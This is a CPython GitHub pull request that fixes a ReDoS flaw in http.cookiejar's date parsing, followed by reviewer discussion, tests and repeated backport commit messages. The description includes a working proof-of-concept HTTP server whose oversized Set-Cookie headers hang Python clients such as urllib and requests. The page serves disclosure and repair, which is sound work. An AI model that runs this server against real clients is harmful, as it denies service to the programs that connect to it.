Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

bpo-38804: Fix REDoS in http.cookiejar #17157

Merged
merged 6 commits into from Nov 22, 2019

Conversation

@bcaller
Copy link
Contributor

bcaller commented Nov 14, 2019

The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).
LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

\d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

from http.server import BaseHTTPRequestHandler, HTTPServer

def make_set_cookie_value(n_spaces):
    spaces = " " * n_spaces
    expiry = f"1-c-1{spaces}!"
    return f"b;Expires={expiry}"

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.log_request(204)
        self.send_response_only(204)  # Don't bother sending Server and Date
        n_spaces = (
            int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
            if len(self.path) > 1 else
            65506  # Max header line length 65536
        )
        value = make_set_cookie_value(n_spaces)
        for i in range(99):  # Not necessary, but we can have up to 100 header lines
            self.send_header("Set-Cookie", value)
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

import http.cookiejar, urllib.request
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

import requests
requests.get("http://localhost:44020/")

https://bugs.python.org/issue38804

The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).
LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  # Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  # Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  # Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")
@the-knights-who-say-ni

This comment has been minimized.

Copy link

the-knights-who-say-ni commented Nov 14, 2019

Hello, and thanks for your contribution!

I'm a bot set up to make sure that the project can legally accept this contribution by verifying everyone involved has signed the PSF contributor agreement (CLA).

CLA Missing

Our records indicate the following people have not signed the CLA:

@bcaller

For legal reasons we need all the people listed to sign the CLA before we can look at your contribution. Please follow the steps outlined in the CPython devguide to rectify this issue.

If you have recently signed the CLA, please wait at least one business day
before our records are updated.

You can check yourself to see if the CLA has been received.

Thanks again for the contribution, we look forward to reviewing it!

@brandtbucher

This comment has been minimized.

Copy link
Member

brandtbucher commented Nov 15, 2019

Thanks for your time @bcaller, and welcome to CPython!

I assume that you've seen the bot's message about the CLA?

@bcaller

This comment has been minimized.

Copy link
Contributor Author

bcaller commented Nov 15, 2019

Yes @brandtbucher, I just signed it.

Copy link
Member

brandtbucher left a comment

This PR should also have a NEWS entry. Something like:

Fixes a ReDoS vulnerability in :class:`http.cookiejar.CookieJar`.
Copy link
Member

brandtbucher left a comment

Thanks @bcaller, this looks good to me now. I’m not an expert on this code though, so we’ll need to find somebody who is.

Copy link
Member

serhiy-storchaka left a comment

LGTM. There is the same problem with ISO_DATE_RE. Do you mind to fix it too?

Would be nice to add tests (if it is possible) -- some examples, which takes more than a hour with unpatched code and just a fraction of second with patched code.

@bcaller

This comment has been minimized.

Copy link
Contributor Author

bcaller commented Nov 15, 2019

ISO_DATE_RE only has 2 overlapping \s*s (compared to 3) so it isn't catastrophic.
Also it is only used when loading LWPCookieJar files, so just processing an HTTP response won't cause DoS.
That said, it is a little inefficient in the case where a LWPCookieJar file has been tampered with so could be fixed in the same way.

I was thinking about the test, but how do I make a test which is reliable, regardless of CPU power and other processes running on the machine? I could make a test which measures the time for successively longer strings and asserts the performance is sub-quadratic?

@serhiy-storchaka

This comment has been minimized.

Copy link
Member

serhiy-storchaka commented Nov 15, 2019

I think it is enough to use an example that takes long time (a hour or few hours). It will not pass unnoticed.

@bcaller

This comment has been minimized.

Copy link
Contributor Author

bcaller commented Nov 15, 2019

I wrote an overcomplicated test

    def test_http2time_redos_regression(self):
        def run_timer(n_spaces):
            return timeit.timeit(
                stmt="http2time(expires)",
                number=5,
                globals=dict(
                    http2time=http2time,
                    expires="1-c-1{}!".format(' ' * n_spaces),
                ),
            )
        base_n_spaces = 500
        factor = 2  # Length of backtracking sequence is increased by this factor
        long_time = run_timer(base_n_spaces * factor)
        short_time = run_timer(base_n_spaces)
        self.assertLess(
            long_time / short_time,  # Execution time increased by this factor
            factor ** 1.2,  # Expected to be approximately equal, but we can have some leeway
            "Performance of http2time is significantly worse than linear",
        )

but I think I'll just do what you said instead.

@bcaller bcaller force-pushed the bcaller:bc-http-cookiejar-redos branch from 27ce2fd to 60de955 Nov 15, 2019
def test_http2time_redos_regression_actually_completes(self):
# LOOSE_HTTP_DATE_RE was vulnerable to malicious input which caused catastrophic backtracking (REDoS).
# If we regress, this test will take a very long time to succeed.
http2time("1-c-1{}!".format(" " * 65506))

This comment has been minimized.

Copy link
@vstinner

vstinner Nov 15, 2019

Member

Would it be possible to use time.perf_counter() to detect if the function takes way too long? For example, test with 1 space, than test with 65K spaces, and test that the second test is not like 1000x slower?

In general, I dislike tests which rely on time, since they are likely to fail on our slowest buildbot. But I don't suggest to use hardcoded timing, only to compare timings of two function calls. It may work on buildbot, especially if the threshold is large enough (1000x slower? more?).

cc @pablogsal

This comment has been minimized.

Copy link
@serhiy-storchaka

serhiy-storchaka Nov 15, 2019

Member

With the fixed regex the test should take a fraction of second.

This comment has been minimized.

Copy link
@bcaller

bcaller Nov 15, 2019

Author Contributor

@vstinner Do you mean something like the above #17157 (comment) ?
The issue here is whether we really should have a unit test for algorithmic complexity of a function at all and what it should look like. Do we do that anywhere else?
I agree that having the one-line test which never explicitly fails is a bit weird.

Copy link
Member

serhiy-storchaka left a comment

http2time() has cubic complexity, iso2time() has quadratic complexity.

def test_http2time_redos_regression_actually_completes(self):
# LOOSE_HTTP_DATE_RE was vulnerable to malicious input which caused catastrophic backtracking (REDoS).
# If we regress, this test will take a very long time to succeed.
http2time("1-c-1{}!".format(" " * 65506))

This comment has been minimized.

Copy link
@serhiy-storchaka

serhiy-storchaka Nov 15, 2019

Member

With the fixed regex the test should take a fraction of second.

Lib/test/test_http_cookiejar.py Outdated Show resolved Hide resolved
@bcaller bcaller force-pushed the bcaller:bc-http-cookiejar-redos branch from 60de955 to 2ea754f Nov 15, 2019
bcaller added 2 commits Nov 15, 2019
If we regress, this test will take a very long time.
A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
@bcaller bcaller force-pushed the bcaller:bc-http-cookiejar-redos branch from 2ea754f to e11dfbe Nov 15, 2019
Copy link
Member

serhiy-storchaka left a comment

Great! I see this is your first contribution. Do you mind to add also your name in Misc/ACKS?

@miss-islington

This comment has been minimized.

Copy link

miss-islington commented Nov 22, 2019

Thanks @bcaller for the PR, and @vstinner for merging it 🌮🎉.. I'm working now to backport this PR to: 3.8.
🐍🍒🤖

miss-islington added a commit to miss-islington/cpython that referenced this pull request Nov 22, 2019
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  GH- Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  GH- Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  GH- Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  GH- Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
(cherry picked from commit 1b779bf)

Co-authored-by: bcaller <bcaller@users.noreply.github.com>
@bedevere-bot

This comment has been minimized.

Copy link

bedevere-bot commented Nov 22, 2019

GH-17341 is a backport of this pull request to the 3.8 branch.

@miss-islington

This comment has been minimized.

Copy link

miss-islington commented Nov 22, 2019

Thanks @bcaller for the PR, and @vstinner for merging it 🌮🎉.. I'm working now to backport this PR to: 3.7.
🐍🍒🤖

@bedevere-bot

This comment has been minimized.

Copy link

bedevere-bot commented Nov 22, 2019

GH-17342 is a backport of this pull request to the 3.7 branch.

miss-islington added a commit to miss-islington/cpython that referenced this pull request Nov 22, 2019
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  GH- Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  GH- Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  GH- Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  GH- Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
(cherry picked from commit 1b779bf)

Co-authored-by: bcaller <bcaller@users.noreply.github.com>
@miss-islington

This comment has been minimized.

Copy link

miss-islington commented Nov 22, 2019

Thanks @bcaller for the PR, and @vstinner for merging it 🌮🎉.. I'm working now to backport this PR to: 3.6.
🐍🍒🤖 I'm not a witch! I'm not a witch!

@bedevere-bot

This comment has been minimized.

Copy link

bedevere-bot commented Nov 22, 2019

GH-17343 is a backport of this pull request to the 3.6 branch.

miss-islington added a commit to miss-islington/cpython that referenced this pull request Nov 22, 2019
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  GH- Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  GH- Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  GH- Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  GH- Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
(cherry picked from commit 1b779bf)

Co-authored-by: bcaller <bcaller@users.noreply.github.com>
vstinner added a commit to vstinner/cpython that referenced this pull request Nov 22, 2019
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  # Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  # Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  # Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.

(cherry picked from commit 1b779bf)
vstinner added a commit to vstinner/cpython that referenced this pull request Nov 22, 2019
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  # Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  # Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  # Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.

(cherry picked from commit 1b779bf)
vstinner added a commit to vstinner/cpython that referenced this pull request Nov 22, 2019
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  # Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  # Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  # Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.

(cherry picked from commit 1b779bf)
@vstinner

This comment has been minimized.

Copy link
Member

vstinner commented Nov 22, 2019

What happens now?

I merged your PR, thanks. I'm ok to skip the automated test to measure the maximum time.

I backported the fix to all supported Python branches: 2.7, 3.5, 3.6, 3.7 and 3.8.

@brandtbucher

This comment has been minimized.

Copy link
Member

brandtbucher commented Nov 22, 2019

Congrats on your first CPython contribution @bcaller! 🍾

Looking forward to seeing more from you in the future.

miss-islington added a commit that referenced this pull request Nov 22, 2019
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  GH- Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  GH- Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  GH- Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  GH- Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
(cherry picked from commit 1b779bf)

Co-authored-by: bcaller <bcaller@users.noreply.github.com>
miss-islington added a commit that referenced this pull request Nov 22, 2019
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  GH- Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  GH- Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  GH- Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  GH- Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
(cherry picked from commit 1b779bf)

Co-authored-by: bcaller <bcaller@users.noreply.github.com>
ned-deily added a commit that referenced this pull request Nov 22, 2019
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

